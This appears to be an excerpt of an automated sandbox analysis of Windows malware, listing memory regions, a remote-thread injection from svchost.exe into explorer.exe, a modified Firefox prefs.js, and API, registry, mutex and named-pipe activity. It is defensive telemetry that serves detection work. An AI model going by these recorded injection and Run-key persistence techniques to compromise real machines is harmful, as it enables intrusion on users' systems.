| private_0x0000000003d00000 | 0x03d00000 | 0x03d00fff | Private Memory | Readable, Writable |
|
|
|
- |
| {0448dc77-1f74-49f5-ba7e-8de74fa55642}.2.ver0x0000000000000001.db | 0x03d20000 | 0x03d20fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x03d30000 | 0x03d33fff | Memory Mapped File | Readable |
|
|
|
- |
| {9d8c497c-611a-4408-acad-eadee99a69bf}.2.ver0x0000000000000001.db | 0x03d40000 | 0x03d40fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000003d50000 | 0x03d50000 | 0x03dcffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003dd0000 | 0x03dd0000 | 0x03dd0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003de0000 | 0x03de0000 | 0x03de0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003df0000 | 0x03df0000 | 0x03df0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003e00000 | 0x03e00000 | 0x03e00fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003e10000 | 0x03e10000 | 0x03e11fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003e40000 | 0x03e40000 | 0x03ebffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003ec0000 | 0x03ec0000 | 0x03f0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003f10000 | 0x03f10000 | 0x03f10fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003f20000 | 0x03f20000 | 0x03f9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000040a0000 | 0x040a0000 | 0x0411ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004120000 | 0x04120000 | 0x0419ffff | Private Memory | Readable, Writable |
|
|
|
- |
| wdmaud.drv.mui | 0x041a0000 | 0x041a0fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| mmdevapi.dll.mui | 0x041b0000 | 0x041b0fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000041c0000 | 0x041c0000 | 0x041c1fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000042d0000 | 0x042d0000 | 0x042d1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000043a0000 | 0x043a0000 | 0x043a1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000043c0000 | 0x043c0000 | 0x043c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000043d0000 | 0x043d0000 | 0x0444ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004450000 | 0x04450000 | 0x04451fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000004460000 | 0x04460000 | 0x04461fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000004470000 | 0x04470000 | 0x04470fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004480000 | 0x04480000 | 0x04480fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004490000 | 0x04490000 | 0x04490fff | Private Memory | Readable, Writable |
|
|
|
- |
| oleaccrc.dll | 0x044a0000 | 0x044a0fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000044b0000 | 0x044b0000 | 0x044b1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000044c0000 | 0x044c0000 | 0x0453ffff | Private Memory | Readable, Writable |
|
|
|
- |
| bthprops.cpl.mui | 0x04540000 | 0x04546fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000004550000 | 0x04550000 | 0x045cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000045d0000 | 0x045d0000 | 0x047cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000047d0000 | 0x047d0000 | 0x04bd2fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000004bf0000 | 0x04bf0000 | 0x04bf0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004c40000 | 0x04c40000 | 0x04c4ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004c90000 | 0x04c90000 | 0x04d0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04e2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004e30000 | 0x04e30000 | 0x04eaffff | Private Memory | Readable, Writable |
|
|
|
- |
| imageres.dll | 0x050c0000 | 0x06414fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000006450000 | 0x06450000 | 0x064cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000064f0000 | 0x064f0000 | 0x0656ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006580000 | 0x06580000 | 0x065fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006610000 | 0x06610000 | 0x0668ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000066d0000 | 0x066d0000 | 0x0674ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006750000 | 0x06750000 | 0x067cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000006840000 | 0x06840000 | 0x068bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000069e0000 | 0x069e0000 | 0x069effff | Private Memory | Readable, Writable |
|
|
|
- |
|
For performance reasons, the remaining 265 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create Remote Thread | #5: c:\windows\system32\svchost.exe | 0x960 | address = 0x76f36930 |
|
1 | |
| Modify Memory | #5: c:\windows\system32\svchost.exe | 0x960 | address = 0x76f36930, size = 4 |
|
2 | |
| Modify Memory | #5: c:\windows\system32\svchost.exe | 0x960 | address = 0x3fa0000, size = 561152 |
|
1 | |
| Modify Memory | #5: c:\windows\system32\svchost.exe | 0x960 | address = 0x2950000, size = 792 |
|
1 | |
| Modify Control Flow | #5: c:\windows\system32\svchost.exe | 0x960 | os_tid = 0x8cc, address = 0x0 |
|
1 |
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\roaming\mozilla\firefox\profiles\3y2joh8o.default\prefs.js | 5.36 KB |
MD5:
98355e412e0ae6a50ea364a9291775ee
SHA1: 511e143755354e79abb3ab4e9870602c8e95f347 SHA256: 8d3037bc713a7c2b9b3c576ebf2404a337b7b6d98b2ef42646d3b0cbb5aa4dc0 |
|
|
Threads
Thread 0x8cc
235
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = ntdll.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = sprintf, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = NtMapViewOfSection, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = NtUnmapViewOfSection, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = NtCreateSection, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = ZwOpenProcessToken, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = ZwClose, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = ZwQueryInformationToken, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = ZwOpenProcess, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = strcpy, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = NtQuerySystemInformation, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = RtlNtStatusToDosError, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = ZwQueryInformationProcess, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = _snprintf, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = _wcsupr, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = _strupr, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = memmove, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = wcscpy, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = memset, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = RtlFreeUnicodeString, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = ZwQueryKey, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = RtlUpcaseUnicodeString, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = wcstombs, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = RtlAdjustPrivilege, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = mbstowcs, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = RtlImageNtHeader, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = memcpy, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = __C_specific_handler, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x0 |
|
1 | |
| Module | Get Address | function = GetFileAttributesW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = VirtualProtectEx, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = FileTimeToLocalFileTime, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = QueueUserWorkItem, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = FindFirstFileA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetFileTime, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = FindNextFileA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CompareFileTime, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = ExpandEnvironmentStringsA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetCurrentProcessId, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetVersion, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetLocalTime, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetModuleFileNameA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CreateDirectoryA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetLastError, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = HeapFree, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = RemoveDirectoryA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CloseHandle, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = LoadLibraryA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CreateFileA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = DeleteFileA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = lstrcpyA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = lstrlenA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = lstrcatA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = WriteFile, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = HeapAlloc, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = HeapDestroy, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = HeapCreate, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = SetEvent, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = HeapReAlloc, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = SuspendThread, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = lstrcmpiW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = ResumeThread, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetModuleHandleA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = lstrcpyW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CreateFileW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CreateThread, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = lstrcatW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = SwitchToThread, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = Sleep, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetTickCount, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CopyFileW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = SetWaitableTimer, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetCurrentThread, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetCurrentThreadId, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = DuplicateHandle, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = lstrlenW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CreateEventA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetWindowsDirectoryA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = DeleteFileW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CreateDirectoryW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetTempPathA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = WaitForSingleObject, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = OpenProcess, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = WaitForMultipleObjects, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = lstrcmpA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = ResetEvent, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CreateMutexA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = MapViewOfFile, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = OpenWaitableTimerA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = UnmapViewOfFile, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = OpenMutexA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = ReleaseMutex, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetVersionExA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CreateWaitableTimerA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = SetLastError, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = lstrcmpiA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = InitializeCriticalSection, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = EnterCriticalSection, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = LeaveCriticalSection, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = UnregisterWait, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = VirtualProtect, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = RegisterWaitForSingleObject, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = TlsAlloc, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = TlsGetValue, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = LoadLibraryExW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = TlsSetValue, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = VirtualAlloc, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetProcAddress, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetFileAttributesA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = OpenFileMappingA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetExitCodeProcess, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetComputerNameW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetFileSize, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CreateProcessA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CreateFileMappingA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetDriveTypeW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = WideCharToMultiByte, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetLogicalDriveStringsW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = lstrcpynA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GlobalUnlock, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = LocalFree, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GlobalLock, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = Thread32First, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CreateToolhelp32Snapshot, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = QueueUserAPC, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = OpenThread, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = Thread32Next, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = ReadFile, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = ConnectNamedPipe, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetOverlappedResult, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CancelIo, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = DisconnectNamedPipe, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = FlushFileBuffers, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CallNamedPipeA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = CreateNamedPipeA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetSystemTime, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = WaitNamedPipeA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = SleepEx, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = OpenEventA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = ExitThread, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = LocalAlloc, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = FreeLibrary, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = RaiseException, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = VirtualFree, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetModuleFileNameW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = FileTimeToSystemTime, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = DeleteCriticalSection, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = ExpandEnvironmentStringsW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = FindClose, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = GetTempFileNameA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = SetEndOfFile, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = FindNextFileW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = SetFilePointer, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = FindFirstFileW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Module | Get Address | function = RemoveDirectoryW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-03-29 15:43:41 (UTC) |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | module_name = KERNEL32.dll, process_name = c:\windows\explorer.exe, file_name_orig = C:\Windows\Explorer.EXE, size = 260 |
|
1 | |
| Module | Get Handle | module_name = KERNEL32.DLL, base_address = 0x76cd0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = IsWow64Process, address_out = 0x76cd91d0 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x7feff120000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x7feff12d710 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x7fefe590000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = StrRChrA, address_out = 0x7fefe594c9c |
|
1 | |
| Module | Load | module_name = USER32.dll, base_address = 0x76df0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = wsprintfA, address_out = 0x76e6bae8 |
|
1 | |
| Mutex | Create | mutex_name = {BE6B9E68-0520-A091-7FD2-09D423264D48} |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = KERNEL32.DLL, base_address = 0x76cd0000 |
|
1 | |
| Module | Get Handle | module_name = NTDLL.DLL, base_address = 0x76ef0000 |
|
1 | |
| Module | Get Handle | module_name = kernelbase, base_address = 0x7fefcef0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetUserNameA, address_out = 0x7feff12dc20 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetShellWindow, address_out = 0x76e054a0 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = GetWindowThreadProcessId, address_out = 0x76e00a90 |
|
1 | |
| Module | Get Handle | module_name = NTDLL.DLL, base_address = 0x76ef0000 |
|
1 | |
| Module | Get Handle | module_name = KERNEL32.DLL, base_address = 0x76cd0000 |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Module | Get Handle | module_name = KERNEL32.DLL, base_address = 0x76cd0000 |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Module | Get Handle | module_name = KERNEL32.DLL, base_address = 0x76cd0000 |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Module | Get Handle | module_name = ADVAPI32.DLL, base_address = 0x7feff120000 |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Module | Load | module_name = PSAPI.DLL, base_address = 0x770b0000 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = EnumProcessModules, address_out = 0x770b1050 |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
172 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = RegQueryValueExA, address_out = 0x7feff13c480 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580, value_name = Ini, type = REG_NONE |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = RegCloseKey, address_out = 0x7feff140710 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580, value_name = Keys, type = REG_NONE |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580, value_name = Client, type = REG_BINARY |
|
1 | |
| Module | Load | module_name = ADVAPI32.DLL, base_address = 0x7feff120000 |
|
1 | |
| Module | Get Handle | module_name = ADVAPI32.DLL, base_address = 0x7feff120000 |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Process | Get Info | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| File | Create Pipe | pipe_name = \device\namedpipe\{ce377949-d5dc-3008-cfe2-d96473361dd8}, open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_TYPE_MESSAGE, max_instances = 255 |
|
1 |
Thread 0x8e4
27
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| File | Create | filename = C:\Windows\system32\c_1252.nls, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\c_1252.nls, type = time |
|
1 | |
| File | Create | filename = C:\Windows\system32\c_1252.nls, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\c_1252.nls, type = time |
|
1 | |
| File | Create | filename = C:\Windows\system32\c_1252.nls, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\c_1252.nls, type = time |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = RegQueryValueExW, address_out = 0x7feff13c2d0 |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, value_name = api--1-0, type = REG_NONE |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = PathCombineW, address_out = 0x7fefe5a3dfc |
|
1 | |
| File | Create Directory | C:\Users\aETAdzjz\AppData\Roaming\Microsoft\Crypore6 |
|
1 | |
| Module | Get Address | module_name = Unknown module name, function = PathFileExistsW, address_out = 0x7fefe59c984 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
